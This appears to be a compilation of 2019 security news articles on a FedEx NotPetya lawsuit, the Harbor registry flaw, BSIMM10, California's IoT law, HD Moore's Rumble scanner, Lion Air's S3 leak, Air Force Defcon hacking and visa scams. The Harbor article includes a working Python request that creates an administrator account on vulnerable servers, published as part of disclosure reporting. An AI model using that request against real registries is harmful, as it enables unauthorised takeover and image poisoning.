
FedEx execs: We had no idea cyberattack would be so bad. Investors: Is that why you sold $40m+ of your own shares?

FedEx execs not only hid the impact of the NotPetya ransomware on their business but personally profited by selling off tens of millions of dollars of their own shares before the truth came out, a lawsuit filed by the delivery business’ own shareholders claims.

The legal complaint [PDF], filed in Delaware, USA, this week, accuses the shipping giant and its top brass of giving “materially false and misleading statements” about the impact of the malware infection on its European subsidiary TNT Express in June 2017. And, the paperwork notes, several top execs off-loaded their shares before the damage caused by the cyber-attack became known and the share price plummeted.

FedEx founder Frederick Smith sold $31m worth of stock at $256 per share in April 2018, and its chief operating officer David Bronczek did the same in January 2018, netting $12m by selling at $225 a share. Other execs are listed as selling roughly $1m apiece in shares around the same time. The share price currently stands at $152 after a massive drop in December 2018, primarily due to its uncertain outlook in Europe for 2019.


Despite FedEx going to some lengths to highlight the impact of the file-scrambling malware on its business – including suspending its shares back in June 2017, and announcing a $300m loss thanks to the code a few months later that September – the shareholders argue that the exec team downplayed the depth of the problem.

At the time, FedEx stressed that no information had been stolen by the cyber-nasty, and only some offices of TNT Express had been disrupted. “Remediation steps and contingency plans are being implemented as quickly as possible,” it said in a statement. But, at the same time, it also refused to answer questions from the press.

The lawsuit, led by shareholder Jason Flaker, claims that FedEx did not flag that growth of its European TNT subsidiary was slowing down as a result of clients that “permanently took their business to competitors.” It also claims that FedEx was less than fully honest about the cost and effort required to get the TNT systems back up and running.

Detriment

As for the share-dumping execs, the lawsuit accuses them of being “unjustly enriched at the expense of and to the detriment of FedEx” while “breaching fiduciary duties” and engaging in insider selling because they were “in possession of material, nonpublic information that artificially inflated the price of FedEx stock.”

You may think that this is just a case of sore investors losing money, but back in July this year, FedEx was hit with another similar lawsuit claiming execs had downplayed the impact of the cyberattack: law firms are queuing up to get a piece of that action.

In fact, lawyers are going to be dining out on the enormous impact of NotPetya: one of the most notable cases being when US snack food giant Mondelez sued its own insurance company in January this year for $100m after the insurers claimed the malware was “an act of war” and therefore it wouldn’t pay out. That case is still ongoing.

A spokesperson for FedEx was not available for immediate comment. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/fedex_execs_sued/

If you’re using Harbor as your container registry, bear in mind it can be hijacked with has_admin_role = True

Video IT departments using the Harbor container registry will want to update the software ASAP, following Thursday’s disclosure of a bug that can be exploited by users to gain administrator privileges.

Aviv Sasson, of Palo Alto Networks’ Unit 42 security team, found that under its default settings, Harbor accepts an API call that can, inadvertently, elevate a normal user’s permissions. If you can reach a vulnerable Harbor installation’s web interface, you can potentially pwn it.

Seeing as Harbor is used by enterprises and cloud platforms to manage collections of Docker and Kubernetes containers, which themselves contain applications and other resources, gaining administrative access is a big deal: a rogue admin can swipe data from the registry, or tamper with containers to inject malware into services.

“The attacker can download all of the private projects and inspect them. They can delete all of the images in the registry or, even worse, poison the registry by replacing its images with their own,” Sasson explained. “The attacker can create a new user and set it to be admin. After that, they can connect to Harbor registry via the Docker command line tool with the new credentials and replace the current images with anything they desire.”

The flaw itself is in the code behind the registry’s HTTP POST-based API. Sasson discovered that a miscreant can request the creation of a new account and, in the same request, grant that account administrator rights. The registration request is not properly screened, so the admin account creation is approved. It is as simple as setting a flag, has_admin_role, in the request to True.

“The problem,” said Sasson, “is that we can send a request and add the parameter…

"has_admin_role" = “True”

…the user that will be created will be an admin. It’s as simple as that.”
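To make the shape of that request concrete, here is a minimal sketch in Python. The host is a placeholder and the /api/users self-registration endpoint is an assumption based on Harbor’s published API; this illustrates the technique rather than reproducing Unit 42’s actual proof-of-concept, and should only ever be pointed at an instance you own.

import requests

HARBOR = "https://harbor.example.com"  # hypothetical lab instance

payload = {
    "username": "eviladmin",
    "email": "eviladmin@example.com",
    "realname": "Evil Admin",
    "password": "S3cretPassw0rd!",
    "has_admin_role": True,  # the unscreened flag at the heart of CVE-2019-16097
}

# Self-registration is open under Harbor's default settings; on vulnerable
# versions the new account comes back with admin rights, while patched
# versions reject or ignore the flag for unauthenticated callers.
resp = requests.post(f"{HARBOR}/api/users", json=payload, timeout=10)
print(resp.status_code, resp.text)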

A video demonstrating exploitation of this programming blunder accompanies Sasson’s disclosure.

Admins can edit the default settings to prevent this from happening, though Sasson reckons most are unaware of that option. In a scan of 2,500 public-facing Harbor instances online, 1,300 were found to be vulnerable.

The vulnerability is designated CVE-2019-16097. Sasson and Unit 42 opted not to brand it with a cute nickname. Good on them.

The bug affects Harbor versions 1.7.0 through 1.8.2. Sysadmins can close the vulnerability by updating to version 1.7.6 or 1.8.3 and later. ®


Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/09/19/harbor_registry_patch/

BSIMM10 Emphasizes DevOps’ Role in Software Security

The latest model, with insights from 122 firms, shows DevOps adoption is far enough along to influence how companies approach software security.

DevOps has reached a point in its adoption at which it influences the way organizations approach software security. Many businesses have implemented an engineering-led security culture to establish and grow software security efforts, researchers say in the BSIMM10 report.

The Building Security in Maturity Model (BSIMM), now in its 10th edition, is the product of a multiyear study of real-world software security initiatives (SSIs) seen in 122 businesses. Synopsys researchers annually compile the BSIMM report to help organizations develop software maturity programs with insights and guidance from real-world firms across industries.

They call the BSIMM a “measuring stick” for software security. Firms can compare the report’s findings to their own projects and gain a better sense of how other organizations are handling the same initiatives. “You can identify your own goals and objectives, then refer to the BSIMM to determine which additional activities make sense for you,” according to the report.

Ten years ago, security was a differentiator for highly regulated firms, many of which built a governance-driven software security initiative to drive security across their portfolios, explains Sammy Migues, information security visionary at Synopsys and one of the report’s authors.

Now, BSIMM10 shows changes in how companies approach software security. A new wave of engineering culture is driving security efforts from engineering teams. There are two major factors in the shift: First is the convergence of process friction, unpredictable effects on delivery schedules, tense relationships, and more human-intensive processes from current SSIs. Second are demands and pressures from modern software delivery methods like Agile and DevOps. As a result, engineering has begun to prioritize automation over human-driven tasks, experts say. Decisions that used to fall to five-person meetings can be made more quickly with Python.

There are more issues at play when it comes to engineering culture, Migues says. Management has been asking more of development teams over the past few years, and developers have dealt with new languages, security requirements, deployment environments, and other changes. Modern ops teams use new logging and analysis methods; emphasis is on efficiency.

“Anything that represents friction or opaqueness is sort of getting pushed aside,” he adds. “If security is too slow for the dev team, the dev team is going to do its own security.” The “old school” security team has to learn how to play in the DevOps culture, Migues emphasizes. Developers’ natural response to managerial pressure is to deliver more software, and faster.

What This Means for Security Groups
The industry is seeing the rise of an organizational structure that values SSIs but doesn’t integrate software security groups (SSGs) into the process as an assigned group, BSIMM10 reports. The SSG starts organically, usually within the engineering group. Engineers take on roles like “BuildSec,” “ContainerSec,” and “DeploymentSec,” testing out specific capabilities like operations security or incident response before they form dedicated security-specific divisions.

In the past year, he says, researchers have noticed a rise in software security efforts within engineering organizations as engineers build out their own security capabilities. “They’re taking all these little piece parts of security related to software, and they’re doing it themselves,” says Migues, noting that this often happens outside the view of the central security department.

Security teams have become accustomed to testing software after its completion and deciding then whether the code is strong enough to go into production. In the future, he says, security teams will become part of the application life cycle, or “value stream,” to use a DevOps term.

“If you’re not part of the value stream, you’re going to be ignored,” Migues adds. It’s not a question of hiring, he explains. It’s a matter of security catching up to the DevOps culture. “You aren’t going to solve tomorrow’s security problems by hiring more security people.”

New Additions to the BSIMM
Researchers adjusted the descriptions of several activities and added three new ones to the BSIMM to reflect what firms are doing to integrate software security. The three new activities in BSIMM10 are software-defined life cycle governance, software-assisted monitoring of software-defined asset creation, and automated verification of software-defined infrastructure.

These additions reflect how businesses are working on ways to accelerate security to match the speed of delivering functionality to market. “These are also direct offshoots of this new engineering-driven culture that’s sort of dragging security behind it,” Migues says. Most organizations don’t have a top-down push to build security into development. Instead, pockets of security are happening at the bottom and getting pulled to the top across the dev team.

It’s important to understand that the difficulty of integrating security into DevOps varies greatly depending on the organization, he continues. Those who are doing DevOps well have homogeneous software portfolios, which gives them an advantage. Netflix, for example, has one application and, consequently, one development culture, Migues explains. “Changing a culture in that kind of homogeneous environment is not that hard,” he continues. While the process can certainly take a long time, it’s more streamlined to rally everyone around a common goal.

In contrast, a Fortune 500 bank may have thousands of applications and several development teams. A process that works for one application may take years to spread across an entire bank, he adds. Smaller companies also have it easier because they have fewer heterogeneous environments. Fewer tech stacks enable a more seamless process than in larger companies.



Article source: https://www.darkreading.com/application-security/bsimm10-emphasizes-devops-role-in-software-security/d/d-id/1335862?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

California’s IoT Security Law Causing Confusion

The law, which goes into effect January 1, requires manufacturers to equip devices with ‘reasonable security feature(s).’ What that entails is still an open question.

Companies that make connected devices — from Internet routers to connected thermostats to home-monitoring cameras — need to start preparing for the enforcement of California’s Internet of Things (IoT) security law, which goes into effect on January 1, 2020, attorneys said this week.

The question is whether a simple authentication fix is enough for most devices or whether companies need to adhere to a more rigorous standard.

The California law, Senate Bill 327, was approved by the governor a year ago and requires that all connected devices sold in the state — no matter where they are made — incorporate “a reasonable security feature or features” that appropriately protect the user of the product and the user’s data from unauthorized access, modification, or disclosure. The law specifies that single hard-coded passwords are not allowed, and each device must either have a unique passcode or require the user to generate a new passcode before using the device for the first time.
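As a rough illustration of the unique-passcode option, a manufacturer could stamp each unit with a cryptographically random default passcode at provisioning time, rather than deriving it from a serial number or MAC address, both of which are guessable. This is a minimal sketch of one possible approach, not anything the statute prescribes:

import secrets

def provision_device_passcode() -> str:
    # Generate a random passcode at manufacture time, to be printed on the
    # device label; each unit gets its own, satisfying the "unique to each
    # device manufactured" option.
    return secrets.token_urlsafe(12)

for device_serial in ["SN0001", "SN0002", "SN0003"]:  # hypothetical serials
    print(device_serial, provision_device_passcode())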

The way the law is written, ensuring devices follow that guidance may be enough, says Christine Lyon, partner in the privacy practice of Morrison Foerster. “The law is only specific to authentication,” she says. “That seems sufficient, but what I suspect will happen over time is that we will see more specificity around the required security features.”

Yet another attorney argues that establishing a strong authentication mechanism is only one of the required features. Guidance of what constitutes “reasonable security” is hinted at by a 2016 California breach report, which labeled the Center for Internet Security’s Critical Security Controls for Effective Cyber Defense as the “floor” for adequate security, says Dan Pepper, a privacy and data protection partner at the law firm BakerHostetler.

“The law is offering companies flexibility,” he says. “But if all you are doing is taking the authentication step and you are not doing anything with updates or patches, encryption, or third-party components, then you are falling short. That authentication piece is just one concrete example.”

The confusion has caused many companies to measure whether there is any risk to them under the statute and to wait for further guidance, the attorneys say. The law does not give consumers the right of private action. Only the government can investigate or penalize companies under the law, which is another consideration for companies in assessing their risk.

While the security required by the law may seem like baby steps, the number of devices impacted by the legislation is quite large, according to the attorneys. The text of the legislation does not specify types of devices, but the law likely applies to a long list of hardware covered by the term “connected device,” including products such as printers and security cameras, smart lightbulbs, and Apple watches, Pepper says.

“Quite a few different types of devices are impacted,” he says.

The California law is not the only legislation to target the security of connected devices. With 25 billion devices expected to be part of the global IoT landscape, legislators are subjecting IoT manufacturers to increasing scrutiny. 

In March, US lawmakers introduced a bipartisan bill into Congress that would require IoT makers selling devices to the government to follow guidelines produced by the National Institute of Standards and Technology. Known as the Internet of Things Cybersecurity Improvement Act of 2019, the bill is the third time that federal legislation has been introduced to require security measures by connected device makers. A bill to govern IoT security has been introduced into Congress annually since 2017.

Because the California law applies to any device sold to consumers in the state — and the manufacture of too many product variants is cost-prohibitive — the impact of the law will likely be national, says Morrison Foerster’s Lyon.

“Because the law’s requirements are not onerous, and because it is time-consuming to create a special version of products just for the Californian market, companies will probably implement these changes across all their products,” she says.

In conjunction with the California Consumer Privacy Act (CCPA), the law will put new responsibilities and restrictions on companies for privacy and data security.

“The enactment of the CCPA will be a watershed moment for data privacy not just in California, but also throughout the United States,” said Attila Tomaschek, data privacy advocate at ProPrivacy.com, in a statement. “Since any applicable business across the country and indeed across the globe that serves consumers in California will be required to abide by the law, companies across the board will likely be gearing up for compliance.”

The California law explicitly does not require that retailers and sellers of devices ensure compliance with the law. The law also seems to prevent using the rule as a reason for anti-tinkering measures, stating that the law does not require features that “prevent a user from having full control over a connected device, including the ability to modify the software or firmware running on the device at the user’s discretion.”

In addition, law enforcement retains the right to gather information about devices from the manufacturer. 



Article source: https://www.darkreading.com/iot/californias-iot-security-law-causing-confusion/d/d-id/1335863?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Metasploit Creator HD Moore’s Latest Hack: IT Assets

Moore has built a network asset discovery tool that wasn’t intended to be a pure security tool, but it addresses a glaring security problem.

HD Moore, famed developer of the wildly popular Metasploit penetration testing tool, is about to go commercial with a new project he originally envisioned would give him a nice break from security.

Moore’s IT asset discovery tool, Rumble Network Discovery, aims to solve one of the most basic yet confounding problems organizations have faced for years: getting a true inventory of all of the devices and services running in their increasingly diverse and growing networks. Misconfigured systems, misconfigured network settings, and unknown unpatched devices sitting on the network are among the most common weak links that expose enterprises to attacks and data breaches. The problem is being exacerbated by the official — and sometimes unofficial — arrival of Internet of Things (IoT) devices on networks.

The renowned security expert, who over the years has also conducted eye-opening research on millions of exposed corporate devices sitting vulnerable on the public Internet, had been bumping up against the network discovery process when building his security tools.

“Every time I’ve written a security product … Metasploit Pro or working on the [Rapid7] Nexpose product, or my prior vulnerability management [tools] I worked on at DDI [Digital Defense Inc.] and BreakingPoint, the very first step of running these things is building a great discovery engine. I never felt like we had enough time,” says Moore, founder and CEO of Critical Research Corp., and vice president of research and development at Atredis Partners.

HD Moore (photo courtesy of HD Moore)

As a penetration tester, he found internal discovery and monitoring lacking at many organizations. “The challenge I ran into is that most customers that I had done security work for didn’t have the ability to centrally monitor all of their traffic in the first place,” he says. “They had huge distributed sites all over the place with strange firewalls and strange rules,” for example, and no way to properly find those devices and configurations.

It’s not that there aren’t any IT asset discovery and security tools available today. There’s the popular open source Nmap program, as well as commercial offerings from Armis, Claroty, Cynerio, Forescout, and others, he says. Some focus on passive network discovery in sensitive environments, such as industrial control systems, and study traffic patterns.

But Moore says the underlying challenge remains that most of today’s discovery tools require administrative access control of the network devices as well as visibility. “If you have that stuff, their products work great,” he says.

However, healthcare networks, large retailers, and universities struggle here because of the fluidity and mobility of user devices connecting to their networks. “Higher education, in particular, struggles quite a bit, with tens of thousands of machines [for example] that are student machines and they don’t directly manage,” he says.

They can adopt central monitoring, but those products often are too pricey for the typical state university. “That’s what kind of rankled me: No one had really spent a lot of time doing active discovery right. Current solutions require having credentials and network-traffic monitoring,” he says.

The goal of Rumble, he says, is to provide a discovery tool that doesn’t require credentials to inventory the devices or monitor the ports. “You can just drop it into a network and find everything,” Moore says.

It sounds so simple and obvious — a true mapping and inventory of devices and their status on the network — but it’s one of the biggest security holes for many organizations.

And it turns out, of course, that Moore hasn’t actually been able to take a sabbatical from security with Rumble. Rumble is already resonating with security managers and researchers who have been beta-testing it over the past six months. To date, it tracks more than 1.8 million network assets and runs 1,500 scans per day, with some 2,000 users.

Moore had wanted to build the tool for IT people who may or may not have security experience or responsibilities, but most of his beta users have been IT people with security roles, security researchers, or IT managers from universities, healthcare organizations, service providers — and even bug bounty organizations.

“Starting out I wanted to avoid security entirely; I didn’t want to sell another security product. I wanted to sell something that was directly useful and didn’t rely on like, five other things, to be useful,” says Moore.

In Moore’s hometown of Austin, University of Texas network security analyst Christian Gugas and his team have been testing Rumble for the past couple of months to check for vulnerabilities in university-issued faculty user systems — mainly for the BlueKeep vulnerability, which exposes Windows machines via the Remote Desktop Protocol [RDP].

“What we would try to do is organize those searches and afterward see what machines had that [RDP] port open. We would try proof-of-concept code to see if we could do anything with those machines in those tests,” Gugas explains.

Gugas says he was impressed with the speed of Rumble — it was faster for his team than Nmap — and the level of detail it provided on the devices the team scanned. There were a couple of false positives, he says, but the results overall were “pretty damn good,” and exporting the data into JSON files let his team’s scripts grab it and catalog it.
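As a sketch of that kind of post-processing, the snippet below filters a JSON export for assets exposing TCP port 3389. The field names (services, addresses, names) and the export layout are assumptions for the sake of illustration, not Rumble’s documented schema:

import json

def hosts_with_open_rdp(path: str):
    # Assume the export is a single JSON array of asset records.
    with open(path) as f:
        assets = json.load(f)
    for asset in assets:
        services = asset.get("services", {})
        # Assume service keys look like "tcp/3389".
        if any(key.endswith("/3389") for key in services):
            yield asset.get("addresses", []), asset.get("names", [])

for addrs, names in hosts_with_open_rdp("rumble_export.json"):
    print(addrs, names)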

Security expert James Boyd, a member of the San Antonio Hackers Association, tested Rumble on his home lab network, on a Linux-based virtual machine. Rumble right away spotted and fingerprinted some rogue machines and wireless access points he had planted in the lab network.

“Everyone wants to do red team [and now blue team],” he says. “No one wants to track what’s on your network; that’s considered boring.” But it’s probably one of the most overlooked parts of security, he adds.

How Rumble Works
Rumble, which officially moves from beta to production at the end of this month, comes as a command-line scanner that can be downloaded and run offline, or as agents that run on almost any platform and report to a cloud-based console. The Go-based platform scans Layers 2 and 3 and “fingerprints” applications, Moore explains. Unlike most scanners, it employs a small number of probes to get as much detail about devices on the network as possible.

The “secret sauce” is mostly how Rumble can “leak” information about a device from its MAC address, such as its network interfaces. “For a lot of IT folks, the MAC address is the absolute source of truth for how they manage inventory,” he says. MACs uniquely identify devices, while IP addresses — which are used for some discovery tools — change, he notes.

Rumble determines the specifics on the device without needing to authenticate to it. “When we do a scan, we can use the MAC to leak out hostnames, stack fingerprints … and merge it all together to see what device is on the network,” he says.

That would help to determine, for instance, whether a device was communicating across a nonauthorized network segment, such as a payment card network that wasn’t supposed to be connected to a retail operations network.
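As a toy illustration of how much a MAC address alone gives away, the first three octets (the OUI) map to the network interface’s vendor in the public IEEE registry. The sketch below stands a tiny hardcoded table in for the full list; Rumble’s own fingerprinting goes far beyond this:

# Sample entries from the public IEEE OUI registry.
OUI_VENDORS = {
    "00:50:56": "VMware",
    "B8:27:EB": "Raspberry Pi Foundation",
    "00:1A:11": "Google",
}

def vendor_from_mac(mac: str) -> str:
    oui = mac.upper()[:8]  # first three octets, e.g. "B8:27:EB"
    return OUI_VENDORS.get(oui, "unknown vendor")

print(vendor_from_mac("b8:27:eb:12:34:56"))  # -> Raspberry Pi Foundation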

A look at Rumble Network Discovery’s user interface (Source: Critical Research Corp.)

But Rumble does not identify malware in the network. That type of detection typically entails traffic monitoring, Moore says, which isn’t the goal of Rumble. “We are looking for how does it respond to the network, what services are exposed,” for example, or which Windows machines are part of the Active Directory Domain, he says.

It employs a homegrown “Splunk-style” search engine, he says. The scan and search data can be exported to JSON, CSV, or other file formats, and regular scans can be scheduled to run in the background.

Shades of previous HD Moore projects are in Rumble, too. Probes from his 2013 work at Rapid7, which discovered nearly 50 million networked devices exposed on the internet via flaws in the Universal Plug and Play (UPnP) protocol, are woven into Rumble, along with other probes he has developed and the fruits of vulnerability research he has conducted over the years.

What’s Really On the Network
Moore says Rumble has rooted out some shocking residents on corporate networks, such as PlayStation 4s and Amazon Echoes. “Consumer-level technology has made its way into every corporate network we’ve ever scanned,” he says. “You see a lot of smart TVs and Apple TV kits … definitely not your typical enterprise equipment.”

He expects managed service providers to be Rumble’s main sweet-spot customer, but he has seen mainly healthcare, state government, and higher education organizations testing it to date. The hope is to keep Rumble affordable for those budget-strapped organizations. “We are looking at being one-fourth or one-third the cost of any comparable security tool,” he notes.

Moore is offering a 50% discount for beta users who graduate to commercial status by October 15. For organizations scanning up to 256 devices, it’s $495 per year; pricing scales with the size of the organization, at $49,995 per year for scanning up to 100,000 devices, for example.

Rapid7 chief scientist Bob Rudis has been testing Rumble in both Rapid7’s labs and his home network. As a security expert diligent about keeping his home network locked down, he thought it was pretty solid: no Wi-Fi for his IoT devices, for example, and mostly Zigbee for communications. But when he ran Rumble on the network, the tool discovered that his weather station device had updated its software and opened an unauthenticated telnet service on his LAN. “I missed something, and this tool caught it,” he says.

Meanwhile, Moore says the initial commercial release is just the beginning. Network discovery is an ongoing challenge, and he expects to be updating Rumble for a long time to come. 

“It’s really boiled down to we want to do an awesome job at discovery and just discovery, and keep our focus on identifying products and identifying services [in the network],” Moore says. “It’s not the most interesting or sexy-sounding technology, but it’s where people actually need help.”



Article source: https://www.darkreading.com/analytics/metasploit-creator-hd-moores-latest-hack-it-assets-/d/d-id/1335860?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Lion Air the Latest to Get Tripped Up by Misconfigured AWS S3

The breach, which reportedly exposed data on millions of passengers, is one of many that have resulted from organizations leaving data publicly accessible in cloud storage buckets.

A breach that reportedly exposed data on millions of passengers of two Lion Air airline subsidiaries is another example of the massive exposure that organizations face from leaving data in poorly secured cloud storage.

The breach — like hundreds of others — resulted when files containing the Indonesian airlines’ passenger names, passport numbers, birth dates, home addresses, and other data were left openly accessible in an Amazon Web Services (AWS) storage bucket.

The data belonged to passengers of Malindo Air and Thai Lion Air. A Dark Web operator known as Spectre later dumped four files — two containing data from Malindo and two with data on Thai Lion Air — online, South China Morning Post (SCMP) reported this week.

Malindo Air confirmed the breach in a statement on its website but did not provide any details on the scope of the compromise. The company said it was in the midst of notifying passengers about the data compromise, while adding that no payment card details had been exposed in the incident.

“Our in house teams along with external data service providers, Amazon Web Services (AWS) and GoQuo, our e-commerce partner, are currently investigating into this breach,” Malindo Air said.

The Lion Air breach is one of many involving Amazon’s S3 storage service. Some of them have been massive in scope and resulted from victim organizations themselves not properly securing access to their data in S3. In other instances, the compromises have resulted from third parties making the same mistake.

In June, Australian cybersecurity vendor UpGuard reported on data integration firm Attunity’s exposing a terabyte’s worth of backups belonging to companies including Ford, Netflix, and TD Bank by putting the data in three publicly accessible S3 buckets. Recently, a Mexican media company exposed more than 540 million records containing comments and interests of Facebook users by leaving the data in an unprotected S3 container.

UpGuard has described detecting literally thousands of breaches over the past few years resulting from poorly configured S3 security settings. The bigger of those have included a breach that exposed GoDaddy’s trade secrets and infrastructure details, a leak of 14 million customer records by Verizon, and the exposure of a Chicago voter database in 2016, right around the general election.

Amazon S3 misconfigurations have become one of the most common and widely targeted attack vectors across all industries, says Anurag Kahol, CTO at Bitglass. “It does not take much for outsiders to find unsecured databases and access sensitive information” on services like S3, he says. Tools are available that let people search for misconfigured and easily abused cloud storage buckets, he notes. “[Infrastructure-as-a-service] platforms are not inherently unsafe – organizations just have to use them safely,” Kahol says.

Organizations that use services like Amazon often mistakenly believe the provider or service itself is responsible for the vast majority of the work when it comes to ensuring proper cybersecurity. However, it is ultimately up to the customer to use and configure these platforms appropriately, Kahol says.

According to UpGuard, AWS itself may be making it easy for users to make S3-related mistakes, even though it has introduced improvements to help organizations detect and avoid common configuration errors.

Easy to Misconfigure
In an August blog, UpGuard pointed to two product features it said could trip up S3 users. One of them is a feature that, if not used correctly, would allow any authenticated user with an AWS account to see content in another user’s storage bucket. “It’s like if your Internet banking credentials worked to log into someone else’s bank account,” UpGuard said.

The second issue has to do with people misunderstanding how S3 settings for access control lists (ACLs) and policies governing access to storage buckets work, the vendor said. It is an easily misunderstood issue that has led to major S3-related breaches. According to UpGuard, organizations can lock down ACLs to an Amazon S3 bucket but still leave data wide open by misconfiguring the bucket policy itself.
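Here is a minimal boto3 sketch of how a customer might check for both pitfalls, assuming credentials allowed to read bucket ACLs and policy status; a real audit would also cover account-level Block Public Access settings and per-object ACLs:

import boto3
from botocore.exceptions import ClientError

PUBLIC_GRANTEES = (
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
)

def audit_bucket(bucket: str) -> None:
    s3 = boto3.client("s3")

    # Pitfall one: ACL grants to every AWS user, authenticated or not.
    acl = s3.get_bucket_acl(Bucket=bucket)
    for grant in acl["Grants"]:
        if grant["Grantee"].get("URI") in PUBLIC_GRANTEES:
            print(f"{bucket}: ACL grants {grant['Permission']} to {grant['Grantee']['URI']}")

    # Pitfall two: a locked-down ACL but a bucket policy that is public anyway.
    try:
        status = s3.get_bucket_policy_status(Bucket=bucket)
        if status["PolicyStatus"]["IsPublic"]:
            print(f"{bucket}: bucket policy makes the bucket public")
    except ClientError as err:
        # Having no bucket policy at all is fine; surface anything else.
        if err.response["Error"]["Code"] != "NoSuchBucketPolicy":
            raise

audit_bucket("example-bucket")  # hypothetical bucket name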

Chris DeRamus, CTO of DivvyCloud, says Amazon has been actively working to help companies avoid breaches caused by misconfigurations. It has also added a number of new features to augment data protection and simplify compliance. For instance, AWS has made it easier for organizations to ensure encryption of all new objects, along with monitoring and reporting on their encryption status. AWS also has guidance on using tools like AWS Config to monitor and respond to S3 buckets that allow public access, DeRamus says.

“Breaches of data in the cloud are on the rise, not breaches of the underlying cloud provider’s infrastructure,” he notes. “The cloud provider is responsible – and typically successful in – securing the underlying components of cloud services.”

It is up to the customer to ensure secure use by properly configuring identity and access management, storage, and compute settings, and using threat analysis and defense tools to mitigate threats, DeRamus says. Automated tools are available that allow organizations to perform real-time, continuous discovery of cloud infrastructure resources and to identify risks and threats that need to be remediated, he adds.

“There’s no excuse for leaving data unprotected in AWS storage,” says Tim Erlin, vice president of product management and strategy at Tripwire. “This isn’t a new problem, and it’s not a technically complex issue to address.”



Article source: https://www.darkreading.com/attacks-breaches/lion-air-the-latest-to-get-tripped-up-by-misconfigured-aws-s3-/d/d-id/1335864?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

Air Force to offer up a satellite to hackers at Defcon 2020

Last month, when the US Air Force went to the Defcon hacker conference, it dragged along an F-15 fighter-jet data system.

The destination: a corner of the conference where the first-ever Aviation Village brought together the aviation industry with the infosec/hacker community. There, vetted security researchers picked that system to pieces.

As in, they literally went at it with screwdrivers and pliers. They filled hotel glasses with screws, nuts and bolts from the Trusted Aircraft Information Download Station. They also remotely inflicted malware on the unit, which collects video and sensor data while the F-15 is in flight.

The attitude of the Air Force to the results: well, that went well. Now, the Air Force has decided to up the ante, as Wired reports. Next year, it’s offering up an orbiting satellite.

Will Roper, the Air Force’s top acquisition official, told the Washington Post that he wasn’t surprised at this year’s results with the F-15 subsystem. He expected the results to be this bad, given decades of neglect of cybersecurity, the military’s hitherto mostly hands-off approach to penetration testing from the private sector, and what the Post calls the “arcane and byzantine” military contracting process, in which companies that build software components won’t let the Air Force pry apart their products for testing.

As Wired has reported, aviation companies have flat-out denied the validity of security researchers’ findings, in spite of some tragic outcomes: faulty controls were implicated in two crashes that killed 346 people in the Lion Air and the Ethiopian Airlines incidents, for example.

Roper told C4ISRNET – a digital magazine focused on military information technology – that these days, the government’s thinking has shifted from its Cold War stance on keeping things close to the vest. It’s essential that it do so, he says:

Historically, we have been very closed about our vulnerabilities. That made sense during the Cold War. When a new technology was developed – whether it was satellites, microprocessors, stealth enhancements – these were big deals and we needed to be very secretive about that technology because to lose it was to lose a decade.

But now technology changes so rapidly, and most of it is driven by software. The idea that closed can make you more secure is a hypothesis we need to question. Industry is going more toward open, being secure by allowing external experts to find vulnerabilities in a way that protects them so that they’re not legally culpable but that provides a safe conduit to make those available to the government.

Vetted researchers’ hacking of an F-15 this year and next year’s hacking of a satellite are just the latest signs of this evolution in the government’s approach to military cyber-, hardware, and supply-chain security.

In 2017, we saw the Air Force offer its first-ever bug bounty program, Hack the Air Force. The Pentagon did the same thing the year before, as did the US Army.

By the end of the third Hack the Air Force challenge – run as a collaboration between the Department of Defense (DoD) and the HackerOne bug bounty platform – $130,000 had been paid out to hackers in exchange for a total of 120 vulnerabilities, HackerOne announced in December 2018.

How to hack a satellite

According to Wired, the Air Force will put out a call for submissions “sometime soon.” Six months before next year’s Defcon, a number of researchers with viable pitches will be invited to try out their ideas during a “flat-sat” phase: basically, a test build comprising all the eventual components. That group will be further culled, and the Air Force’s vetted picks will be flown to Defcon for a live hacking competition.

Roper:

What we’re planning on doing is taking a satellite with a camera, have it pointing at the Earth, and then have the teams try to take over control of the camera gimbals and turn toward the moon. So, a literal moon shot.

Which specific satellite will be targeted hasn’t yet been determined, but Wired says that it will likely be one flying in low Earth orbit. Nor has it been determined how many teams will be selected in each round, or how much money will be paid out for a final cash award.

Given that this is military equipment, the researchers will again have to be vetted, same as for the F-15.

Roper is hoping that it’s worth the hassle, though. The Air Force wants the security community to get its hands on these systems as early in the process as possible, so it doesn’t keep building on top of vulnerable systems, he said:

We want to hack in design, not after we’ve built. The right place to do it is when that flat-sat equivalent exists for every system. Let the best and brightest come tear it up, because the vulnerabilities are less sensitive then. It’s not an operational system. It’s easier to fix. There’s no reason not to do it other than the historical fear that we have letting people external to the Air Force in.

How can the Air Force possibly top the invitation to come hack a satellite? Well, Roper says, he’s next working on getting an entire plane to Defcon. The difficulty of pulling that off?

The conference lacks the space.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/wh-pZprliQk/

Chinese students in UK ripe target for scammers exploiting visa concerns

Scammers are exploiting Chinese students’ Brexit fears by targeting them with phishing emails claiming their visas could be revoked, threat intel researchers say.

The swindle, a latter-day variation on an age-old theme, consists of presenting a threat to students’ immigration status “and uses various techniques to extract sizeable payments from the victims”, according to Malwarebytes.

Pointing to open UK student admissions data as a “broad surface of attack”, Malwarebytes reckons that this openness leads to scammers knowing exactly which institutions to target. This, it said, lets criminals easily exploit current Brexit-related visa fears to target naive students, most of whom will be living abroad for the first time ever.

“There is a persistent incorrect stereotype that Chinese students in the UK all come from wealthy families,” said the firm in a blog about its findings.

While scams targeting overseas students go back years, the latest incarnation revolves around using stolen credentials to target vulnerable marks. In one example, a student whose laptop was stolen at Heathrow Airport began receiving phone calls from people claiming to be Chinese Embassy workers. They said the student had been implicated in a money-laundering scam.

To convince students that the scammers were actually police investigators, they were sent links to a website appearing to belong to the Chinese authorities. Displayed on that website was personal data that had been lifted from the student’s stolen laptop – scans of ID cards, mugshots, banking details, and so on.

“By the time they’d forced the student to upload a recorded statement to the social media site QQ and threatened them with deportation and imprisonment via web streams of men dressed up as police, they were likely too panicked to realise where they’d obtained all this information from in the first place,” said Malwarebytes’ Christopher Boyd.

Once targeted in this way, marks were “encouraged” to send large sums of money to the “prosecutors” to buy them off.

Aside from the general security advice – encrypt your devices, enable multi-factor authentication and use password managers – the most important point is that UK authorities do not phone people up or contact them online to tell them they’re under investigation.

